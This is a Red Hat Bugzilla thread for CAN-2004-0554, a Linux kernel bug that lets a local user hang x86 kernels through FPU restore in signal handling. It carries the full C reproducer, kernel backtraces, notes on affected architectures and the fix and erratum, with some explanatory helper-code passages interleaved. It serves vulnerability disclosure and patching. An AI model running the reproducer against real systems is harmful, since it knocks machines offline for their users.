Bug 125794

Summary: CAN-2004-0554 local user can get the kernel to hang
Product: Red Hat Enterprise Linux 3
Component: kernel
Version: 3.0
Hardware: i386
OS: Linux
Status: CLOSED ERRATA
Severity: medium
Priority: medium
Keywords: Security
Reporter: Petter Reinholdtsen <pere>
Assignee: Ernie Petrides <petrides>
CC: bark, bnocera, greg, holger, jrfuller, k.georgiou, mjc, petrides, riel, shadow, tao, tburke, trondham, woodard
URL: http://marc.theaimsgroup.com/?l=linux-kernel&m=108681568931323&w=2
Doc Type: Bug Fix
Last Closed: 2004-06-18 00:59:36 UTC
Bug Blocks: 116727

Description Petter Reinholdtsen 2004-06-11 14:44:16 UTC

Description of problem:

A message posted to linux-kernel two days ago describes the problem:
<URL: http://marc.theaimsgroup.com/?l=linux-kernel&m=108681568931323&w=2 >.
I could not find this bug reported in the Red Hat Bugzilla, so
I am reporting it here.

The problem is that the code available from
<URL: http://gcc.gnu.org/bugzilla/show_bug.cgi?id=15905 > causes the
kernel to hang when executed as a normal user.  It has been
tried on several kernel versions and seems to affect all of them.

Comment 1 Ernie Petrides 2004-06-11 22:19:54 UTC

Hello, Petter.  Could you please post a test case in this bugzilla
report (as well as any possible panic or oops output from the
console)?  As it stands, there's not enough information in this
report to debug a potential problem.

Thanks.  -ernie

Comment 2 Petter Reinholdtsen 2004-06-11 22:27:54 UTC

Sure.  Are you on a closed network or something?  The second
URL contains the source.  Here it is:

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void Handler(int ignore)
{
 char fpubuf[108];
 __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
 write(2, "*", 1);
 __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
 struct itimerval spec;
 signal(SIGALRM, Handler);
 spec.it_interval.tv_sec=0;
 spec.it_interval.tv_usec=100;
 spec.it_value.tv_sec=0;
 spec.it_value.tv_usec=100;
 setitimer(ITIMER_REAL, &spec, NULL);
 while(1)
  write(1, ".", 1);

 return 0;
}
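
A note on the 108-byte buffer in the test case: 108 bytes is the size of
the state image that FSAVE writes and FRSTOR reads in 32-bit protected
mode (a 28-byte environment followed by eight 10-byte registers).  The
following is only a sketch of that layout; the struct and function names
are hypothetical, chosen for illustration, and are not part of the
original reproducer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical layout, for illustration only.  The reproducer itself
 * just uses an opaque char[108]. */
struct fsave_area {
    uint32_t cwd;              /* control word (low 16 bits used) */
    uint32_t swd;              /* status word (low 16 bits used) */
    uint32_t twd;              /* tag word (low 16 bits used) */
    uint32_t fip;              /* last instruction pointer offset */
    uint32_t fcs;              /* last instruction pointer selector */
    uint32_t foo;              /* last operand pointer offset */
    uint32_t fos;              /* last operand pointer selector */
    uint8_t  st_space[8][10];  /* ST(0)..ST(7), 80 bits each */
};

/* Returns the number of bytes covered by the assumed layout. */
static size_t fsave_area_size(void)
{
    /* The register stack starts right after the 28-byte environment. */
    assert(offsetof(struct fsave_area, st_space) == 28);
    return sizeof(struct fsave_area);
}
```

Under this layout fsave_area_size() comes to 28 + 80 = 108 bytes, which
matches the char fpubuf[108] declared in the handler.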

Comment 3 Rik van Riel 2004-06-12 02:51:34 UTC

OK, I reproduced the hang on my test system, got a backtrace too... ;)

Pid: 19752, comm:      kernel-hang-bz1
EIP: 0060:[<ffff345c>] CPU: 0
EIP is at 0xffff345c
 EFLAGS: 00000202    Not tainted  (2.6.5-1.332)
EAX: 00000001 EBX: 12005870 ECX: fef32ea8 EDX: 1958f000
ESI: 1958f000 EDI: fef32ea8 EBP: fef32e48 DS: 007b ES: 007b
CR0: 80050033 CR2: 00c4b720 CR3: 003ab000 CR4: 000006d0
Call Trace:
 [<0210dcda>] restore_i387_fxsave+0x18/0x60
 [<0210dd38>] restore_i387+0x16/0x65
 [<021059e5>] restore_sigcontext+0xf2/0x10c
 [<0215b737>] get_user_size+0x30/0x57
 [<02105c13>] sys_sigreturn+0x214/0x23a

Comment 4 Rik van Riel 2004-06-12 02:52:57 UTC

Hmmm, this backtrace is with a 2.6 kernel btw....

Tried it before rebooting my test box into a RHEL3 kernel ;))

Comment 5 Rik van Riel 2004-06-12 03:05:50 UTC

Here is the backtrace (alt-sysrq-p) for the very latest RHEL3 kernel.
 Definitely looks like 

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c03ec1cc>] CPU: 0
EIP is at coprocessor_error [kernel] 0x0 (2.4.21-15.5.ELsmp)
 ESP: 0060:c0113d14 EFLAGS: 00000206    Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

Comment 7 Rik van Riel 2004-06-12 03:09:26 UTC

And a second alt-sysrq-p trace, of the same hang.  Guess it's looping
somewhere in the FPU restore and exception handling code?

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c01137b7>] CPU: 0
EIP is at save_init_fpu [kernel] 0x17 (2.4.21-15.5.ELsmp)
 ESP: 8000:c010cd47 EFLAGS: 00000206    Not tainted
EAX: bfebfbff EBX: d9818000 ECX: 00000068 EDX: d9818000
ESI: d9818000 EDI: c010ce50 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c010cd47>] math_error [kernel] 0x17 (0xd9819e18)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819e34)
[<c012f015>] bh_action [kernel] 0x55 (0xd9819e48)
[<c012eeb7>] tasklet_hi_action [kernel] 0x67 (0xd9819e50)
[<c010db38>] do_IRQ [kernel] 0x148 (0xd9819e84)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

Comment 8 Rik van Riel 2004-06-12 03:11:07 UTC

... and a bunch more, in different functions ...

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c03ec1e4>] CPU: 0
EIP is at device_not_available [kernel] 0x0 (2.4.21-15.5.ELsmp)
 ESP: 0060:c0113d14 EFLAGS: 00000206    Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

SysRq : Show Regs

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c010d005>] CPU: 0
EIP is at math_state_restore [kernel] 0x5 (2.4.21-15.5.ELsmp)
 ESP: c20f:c0113d14 EFLAGS: 00000286    Not tainted
EAX: 8005003b EBX: d9818000 ECX: bfffc888 EDX: 00000068
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

SysRq : Show Regs

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c010d005>] CPU: 0
EIP is at math_state_restore [kernel] 0x5 (2.4.21-15.5.ELsmp)
 ESP: c20f:c0113d14 EFLAGS: 00000286    Not tainted
EAX: 8005003b EBX: d9818000 ECX: bfffc888 EDX: 00000068
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

SysRq : Show Regs

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c03ec1cc>] CPU: 0
EIP is at coprocessor_error [kernel] 0x0 (2.4.21-15.5.ELsmp)
 ESP: 0060:c0113d14 EFLAGS: 00000206    Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

SysRq : Show Regs

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c03ec1e6>] CPU: 0
EIP is at device_not_available [kernel] 0x2 (2.4.21-15.5.ELsmp)
 ESP: 3d14:ffffffff EFLAGS: 00000206    Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

SysRq : Show Regs

Pid/TGid: 3815/3815, comm:      kernel-hang-bz1
EIP: 0060:[<c01355ab>] CPU: 0
EIP is at force_sig_info [kernel] 0x8b (2.4.21-15.5.ELsmp)
 ESP: 9e28:00000008 EFLAGS: 00000282    Not tainted
EAX: 00000000 EBX: d9818000 ECX: d992d380 EDX: d992d300
ESI: ffffffff EDI: 00000008 EBP: ffffffff DS: 0068 ES: 0068 FS: 0000
GS: 0033
CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:   [<c010ce50>] do_coprocessor_error [kernel] 0x0 (0xd9819e10)
[<c010cde8>] math_error [kernel] 0xb8 (0xd9819e18)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819e34)
[<c01343a2>] timer_bh [kernel] 0x62 (0xd9819e40)
[<c0133dcb>] update_process_times_statistical [kernel] 0x7b (0xd9819e48)
[<c012f015>] bh_action [kernel] 0x55 (0xd9819e54)
[<c012eeb7>] tasklet_hi_action [kernel] 0x67 (0xd9819e5c)
[<c010db38>] do_IRQ [kernel] 0x148 (0xd9819e90)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

Comment 10 Rik van Riel 2004-06-12 16:30:24 UTC

OK, it looks like this bug is being tracked down on the linux-kernel
mailing list.  We'll make sure all the kernels shipped by Red Hat will
get the fix once we all agree on what the right fix is upstream.

This code is definitely too subtle for a "quick fix"... ;)

Comment 11 Johnray Fuller 2004-06-14 18:56:02 UTC

FYI, I got this from a customer:

"btw - we're noticing that it doesn't totally kill an SMP machine, but
rather throws one of the CPUs into a 100% system-time loop, with a
process that you can't kill

That tidbit might be of use to the kernel engineering guys"

Thanks,
J
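
One way to confirm the symptom the customer describes (a single CPU
pinned in system time) is to sample the per-CPU lines of /proc/stat
twice and compare them.  The following is a minimal sketch, assuming the
four leading counters are user, nice, system and idle; any further
columns that newer kernels append are ignored.  The struct and function
names are hypothetical.

```c
#include <assert.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>

struct cpu_sample {
    int cpu;                                     /* CPU index from "cpuN" */
    unsigned long long user, nice, system, idle; /* tick counters */
};

/* Parse one per-CPU line such as "cpu1 4705 150 1120 16250".
 * Returns 1 on success, 0 otherwise.  The aggregate "cpu " line is
 * rejected because no digit follows "cpu" directly. */
static int parse_cpu_line(const char *line, struct cpu_sample *out)
{
    assert(line != NULL && out != NULL);
    if (strncmp(line, "cpu", 3) != 0 || !isdigit((unsigned char)line[3]))
        return 0;
    return sscanf(line, "cpu%d %llu %llu %llu %llu",
                  &out->cpu, &out->user, &out->nice,
                  &out->system, &out->idle) == 5;
}

/* Fraction of elapsed ticks spent in system mode between two samples
 * of the same CPU (0.0 if no ticks elapsed). */
static double system_share(const struct cpu_sample *before,
                           const struct cpu_sample *after)
{
    unsigned long long sys = after->system - before->system;
    unsigned long long total = (after->user - before->user)
                             + (after->nice - before->nice)
                             + sys
                             + (after->idle - before->idle);
    return total == 0 ? 0.0 : (double)sys / (double)total;
}
```

A CPU stuck in the loop described above would be expected to show a
system_share() close to 1.0 across successive samples while the other
CPUs stay lower.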

Comment 12 Petter Reinholdtsen 2004-06-14 18:58:44 UTC

Do you have an estimate of when we can expect a new kernel
that fixes this?  We need to schedule an upgrade and reboot
of 850 Red Hat machines, and it would be nice if we could
start planning already.

Comment 13 Klaus Weidner 2004-06-14 19:21:51 UTC

FYI, this bug also affects x86_64 (Opteron) when running a 32-bit
version of the exploit code. Native 64-bit mode is not affected, but
the default kernel enables 32-bit emulation mode.

32-bit mode on ia64 (Itanium) may also be affected (untested).
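
Since the result reportedly depends on whether the test is built as
32-bit or 64-bit code, it can help to have a test binary state which one
it is.  This is a small sketch using the __x86_64__ and __i386__ macros
predefined by GCC-compatible compilers; the function name is
hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Reports the architecture this translation unit was compiled for,
 * based on compiler-predefined macros. */
static const char *build_abi(void)
{
#if defined(__x86_64__)
    const char *abi = "x86_64";
#elif defined(__i386__)
    const char *abi = "i386";
#else
    const char *abi = "other";
#endif
    assert(abi != NULL);
    return abi;
}
```

With GCC on an x86_64 host, building with -m32 should make this report
"i386", which is the case described as affected above.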

Comment 14 Ernie Petrides 2004-06-14 22:54:22 UTC

A fix is in hand (posted in comment #5 of bug 125900).  Thanks
for the reproducer (in comment #2) and all the extra information.

I'll post more information when the fix is committed to RHEL3 U3
and also about what our plans are for issuing an RHSA erratum.

Comment 15 Ernie Petrides 2004-06-14 23:07:47 UTC

*** Bug 125968 has been marked as a duplicate of this bug. ***

Comment 16 Mark J. Cox 2004-06-15 07:29:33 UTC

Allocated CAN-2004-0554

Comment 17 Ernie Petrides 2004-06-15 10:11:41 UTC

A fix for this problem has just been committed to the RHEL3 U3
patch pool this evening (in kernel version 2.4.21-15.11.EL).

I will update this bug report again as soon as a (pre-U3)
security advisory is available.

Comment 18 Ernie Petrides 2004-06-17 11:13:13 UTC

Petter, in response to your comment #12, there is a Red Hat
Security Advisory in the works (RHSA-2004:255) for this bug
and two other problems.  Best case is that it will become
available late tonight (Thursday) on RHN, but it's more likely
to first be available tomorrow (Friday).  When the Errata is
pushed, this bug report will automatically be updated and closed.

Comment 19 Jay Turner 2004-06-18 00:59:36 UTC

An erratum has been issued which should resolve the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2004-255.html